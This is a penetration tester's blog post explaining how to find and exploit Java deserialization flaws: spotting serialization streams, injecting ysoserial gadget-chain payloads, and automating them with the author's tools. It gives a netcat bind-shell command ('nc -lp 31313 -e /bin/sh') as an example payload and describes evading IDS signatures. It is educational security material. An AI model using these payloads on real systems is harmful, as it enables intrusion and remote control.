Exploitation

Attacking Java Deserialization

Deserialization vulnerabilities are far from new, but exploiting them is more involved than other common vulnerability classes. During a recent client engagement I was able to take advantage of Java deserialization to gain a foothold on a server from where I was able to obtain root access to tens of servers spanning pre-production and production environments across multiple data centres. The vulnerability I discovered had previously survived multiple pentests and I would have missed it too if I hadn’t had prior exposure to Java (de)serialization.

In this blog post I’ll attempt to clear up some confusion around deserialization vulnerabilities and hopefully lower the bar to entry in exploiting them using readily available tools. I’ll be focusing on Java, however the same concepts apply to other languages. I’ll also be focusing on command execution exploits in order to keep things simple.

I spoke about this topic at SteelCon this year and will also be speaking on the topic at BSides Manchester and BSides Belfast (on that note, I’m also speaking about poking one of Java’s back doors at 44con this year)!

Update (22/08/2017): A references section has been added at the end of the article listing the links mentioned throughout the article.

(De)serialization

Briefly, serialization is the process of converting runtime variables and program objects into a form that can be stored or transmitted. Deserialization is the reverse process that converts the serialized form back into in-memory variables and program objects. The serialized form could be a text-based format such as JSON or XML, or a binary format. Many higher level languages such as C#, Java, and PHP have built-in support for data serialization which is trivial to use and saves the developer from having to implement these routines themselves. In this blog post I’ll be focusing on Java’s built-in serialization format but other formats can come with similar risks (check out Alvaro Muñoz and Oleksandr Mirosh’s Black Hat USA 2017 and Def Con 25 talk Friday the 13th: JSON Attacks for more on this).

What’s the Problem?

The use of (de)serialization isn’t a problem itself. Problems arise when a user (attacker) can control the data being deserialized, for example if data can be delivered to the deserialization routine over a network connection. If an attacker has control of data being deserialized, then they have some influence over in-memory variables and program objects. Subsequently, if an attacker can influence in-memory variables and program objects, then they can influence the flow of code that uses those variables and objects. Let’s look at an example of Java deserialization:

The ‘loadSession’ method accepts an array of bytes as a parameter and deserializes a string and a boolean from that byte array into the ‘username’ and ‘loggedIn’ properties of the object. If an attacker can control the contents of the ‘sessionData’ byte array passed to this method then they can control these object properties. The following is an example of how this Session object might be used:

If the session is logged in then the password for the user whose username is stored in the session is updated to the given value. This is a simple example of a ‘POP Gadget’, a snippet of code that we have some control over via the properties of an object.

Property-Oriented Programming

When we control object properties and use them to influence the flow of code execution in this way we are doing what’s known as ‘property-oriented programming’. A POP gadget is a code snippet that we can influence to our advantage by manipulating the properties of some object. Often multiple gadgets will need chaining in order to create a complete exploit. We can think of this as high-level ROP (return-oriented programming – a technique used in memory corruption exploits) except that instead of a ROP gadget pushing a value onto the stack, a POP gadget might allow us to write some data to a file.

An important point here is that a deserialization exploit does not involve sending classes or code to the server to execute. We’re simply sending the properties of classes that the server is already aware of in order to manipulate existing code that deals with those properties. A successful exploit hence relies on knowledge of the code that can be manipulated through deserialization. This is where a lot of the difficulty in exploiting deserialization vulnerabilities stems from.

Interesting Gadgets

POP gadgets can exist anywhere in a program, the only requirements are that the code can be manipulated using the properties of deserialized objects, and that an attacker can control the data being deserialized. Some gadgets are of greater interest, however, because their execution is more predictable. In Java, a serializable class can define a method named readObject which can be used to perform special handling during deserialization (for example supporting backwards compatibility). This method can also be used to respond to the event of an object of that class being deserialized. An example use of this method might be for a database manager object to automatically establish a connection to the database when it is deserialized into memory. Most Java serialization exploits take advantage of the code within these readObject methods because the code is guaranteed to be executed during deserialization.

Exploiting Deserialization

To exploit a deserialization vulnerability we need two key things:

  1. An entry point that allows us to send our own serialized objects to the target for deserialization.
  2. One or more code snippets that we can manipulate through deserialization.

Entry Points

We can identify entry points for deserialization vulnerabilities by reviewing application source code for the use of the class ‘java.io.ObjectInputStream’ (and specifically the ‘readObject’ method), or for serializable classes that implement the ‘readObject’ method. If an attacker can manipulate the data that is provided to the ObjectInputStream then that data presents an entry point for deserialization attacks. Alternatively, or if the Java source code is unavailable, we can look for serialized data being stored on disk or transmitted over the network, provided we know what to look for!

The Java serialization format begins with a two-byte magic number which is always hex 0xAC ED. This is followed by a two-byte version number. I’ve only ever seen version 5 (0x00 05) but earlier versions may exist and in future later versions may also exist. Following the four-byte header are one or more content elements, the first byte of each should be in the range 0x70 to 0x7E and describes the type of the content element which is used to infer the structure of the following data in the stream. For more details see Oracle’s documentation on the Object Serialization Stream Protocol.

People often say to look for the four-byte sequence 0xAC ED 00 05 in order to identify Java serialization, and in fact some IDS signatures look for this sequence to detect attacks. During my recent client engagement I didn’t immediately see those four bytes because the target client application kept a network connection to the server open the entire time it was running and the four-byte header only exists once at the very beginning of a serialization stream. The client’s IDS missed my attacks for this reason – my payloads were sent later in the stream and separately from the serialization header.

We can use an ASCII dump to help identify Java serialization data without relying on the four-byte 0xAC ED 00 05 header.

The most obvious indicator of Java serialization data is the presence of Java class names in the dump, such as ‘java.rmi.dgc.Lease’. In some cases Java class names might appear in an alternative format that begins with an ‘L’, ends with a ‘;’, and uses forward slashes to separate namespace parts and the class name (e.g. ‘Ljava/rmi/dgc/VMID;’). Along with Java class names, there are some other common strings that appear due to the serialization format specification, such as ‘sr’ which may represent an object (TC_OBJECT) followed by its class description (TC_CLASSDESC), or ‘xp’ which may indicate the end of the class annotations (TC_ENDBLOCKDATA) for a class which has no super class (TC_NULL).

Having identified the use of serialized data, we need to identify the offset into that data where we can actually inject a payload. The target needs to call ‘ObjectInputStream.readObject’ in order to deserialize and instantiate an object (payload) and support property-oriented programming, however it could call other ObjectInputStream methods first, such as ‘readInt’ which will simply read a 4-byte integer from the stream. The readObject method will read the following content types from a serialization stream:

  • 0x70 – TC_NULL
  • 0x71 – TC_REFERENCE
  • 0x72 – TC_CLASSDESC
  • 0x73 – TC_OBJECT
  • 0x74 – TC_STRING
  • 0x75 – TC_ARRAY
  • 0x76 – TC_CLASS
  • 0x7B – TC_EXCEPTION
  • 0x7C – TC_LONGSTRING
  • 0x7D – TC_PROXYCLASSDESC
  • 0x7E – TC_ENUM

In the simplest cases an object will be the first thing read from the serialization stream and we can insert our payload directly after the 4-byte serialization header. We can identify those cases by looking at the first five bytes of the serialization stream. If those five bytes are a four-byte serialization header (0xAC ED 00 05) followed by one of the values listed above then we can attack the target by sending our own four-byte serialization header followed by a payload object.

In other cases, the four-byte serialization header will most likely be followed by a TC_BLOCKDATA element (0x77) or a TC_BLOCKDATALONG element (0x7A). The former consists of a single byte length field followed by that many bytes making up the actual block data and the latter consists of a four-byte length field followed by that many bytes making up the block of data. If the block data is followed by one of the element types supported by readObject then we can inject a payload after the block data.

I wrote a tool to support some of my research in this area, SerializationDumper, which we can use to identify entry points for deserialization exploits. The tool parses Java serialization streams and dumps them out in a human-readable form. If the stream contains one of the element types supported by readObject then we can replace that element with a payload object. Below is an example of its use:

In this example the stream contains a TC_BLOCKDATA followed by a TC_STRING which can be replaced with a payload.

Objects in a serialization stream are instantiated as they are loaded, rather than after the entire stream has been parsed. This fact allows us to inject payloads into a serialization stream without worrying about correcting the remainder of the stream. The payload will be deserialized and executed before any kind of validation happens and before the application attempts to read further data from the serialization stream.

POP Gadgets

Having identified an entry point that allows us to provide our own serialized objects for the target to deserialize, the next thing we need are POP gadgets. If we have access to the source code then we can look for ‘readObject’ methods and code following calls to ‘ObjectInputStream.readObject’ in order to work out what potential gadgets exist.

Often we don’t have access to application source code but this doesn’t prevent us from exploiting deserialization vulnerabilities because there are lots of commonly used third-party libraries that can be targeted. Researchers including Chris Frohoff and Gabriel Lawrence have already found POP gadget chains in various libraries and released a tool called ysoserial that can generate payload objects. This tool greatly simplifies the process of attacking Java deserialization vulnerabilities!

There are a lot of gadget chains included in ysoserial so the next step is to work out which, if any, can be used against the target. Background knowledge about the third-party libraries used by the application, or an information disclosure issue, should be the first port of call. If we know which third-party libraries are used by the target then we can select the appropriate ysoserial payload(s) to try. Unfortunately this information might not be readily available in which case we can, with caution, cycle through the various ysoserial gadget chains until we find one we can use. Care should be taken with this approach as there is always a risk of triggering an unhandled exception and crashing the target application. The target would have to be particularly unstable for this to happen, however, as even an nmap version scan would likely cause the target to crash if it couldn’t handle unexpected/malformed data.

If the target application responds to a ysoserial payload with a ‘ClassNotFoundException’ then chances are that the library targeted by the chosen gadget chain is not available to the target application. A ‘java.io.IOException’ with the message ‘Cannot run program’ likely means that the gadget chain worked, however the operating system command that the gadget chain attempted to execute was not available on the server.

The ysoserial command execution payloads are blind payloads and the command output is not returned. There are also a couple of limitations due to the use of ‘java.lang.Runtime.exec(String)’. The first is that shell operators such as output redirection and piping are not supported.  The second is that parameters to the payload command cannot contain spaces (e.g. we can use “nc -lp 31313 -e /bin/sh” but we can’t use “perl -e ‘use Socket;…'” because the parameter to perl contains a space). Fortunately there’s a nice payload encoder/generator available online which can get around these limitations here: http://jackson.thuraisamy.me/runtime-exec-payloads.html.

Try it Yourself – DeserLab and SerialBrute

It’s important to understand serialization and how deserialization exploits work (e.g. property-oriented programming) in order to effectively exploit deserialization vulnerabilities. Doing so is still more involved than other common vulnerability classes so it’s helpful to have a target to practice on. Along with this blog post, I’ve created and released a demo application called DeserLab that implements a custom network protocol on top of the Java serialization format. The application is vulnerable to deserialization attacks and should be exploitable using the information provided in this blog post.

SerialBrute is a pair of Python scripts that I wrote and use to automate testing of ysoserial payloads against arbitrary targets. The first, SerialBrute.py’, can replay a TCP conversation or HTTP request and inject a payload at a given point while the second, ‘SrlBrt.py’ is a skeleton script that can be altered to deliver payloads where special processing is needed. Both attempt to detect valid and invalid payloads by looking at returned exceptions. These scripts are not intended to be full blown or polished attack tools and should be used with caution due to the risk of knocking an application over but I’ve personally had great success replaying TCP conversations and injecting ysoserial gadget chains.

Thanks for reading! Have a go at DeserLab if this is something you’re interested in and if there’s anything I’ve missed, anything that could do with further explanation, or you have any questions or feedback please leave a comment or get in touch on Twitter (@NickstaDB)!

References

The following references, mostly mentioned throughout this blog post, may be useful in learning more about (de)serialization vulnerabilities and exploits.

The following presentations cover property-oriented programming (POP) and, for those who are interested, return-oriented programming (ROP). Note that the ROP presentation is only mentioned due to the similarities with POP (i.e. controlling existing code); the ROP technique itself is not relevant to deserialization exploits.

The following articles and presentations discuss PHP and Java deserialization vulnerabilities:

The following talk looks at deserialization vulnerabilities in JSON and XML libraries for Java and .NET:

The following sections of the Java documentation describe the serialization data format and the Serializable interface:

The tools mentioned throughout this blog post can be found at the following links:

Finally, the following people have done significant work around Java deserialization exploitation:

Advertisements

Discussion

2 responses to ‘Attacking Java Deserialization

Leave a Reply

Pingbacks & Trackbacks

  1. My Reading List Q3 2017 | Bigta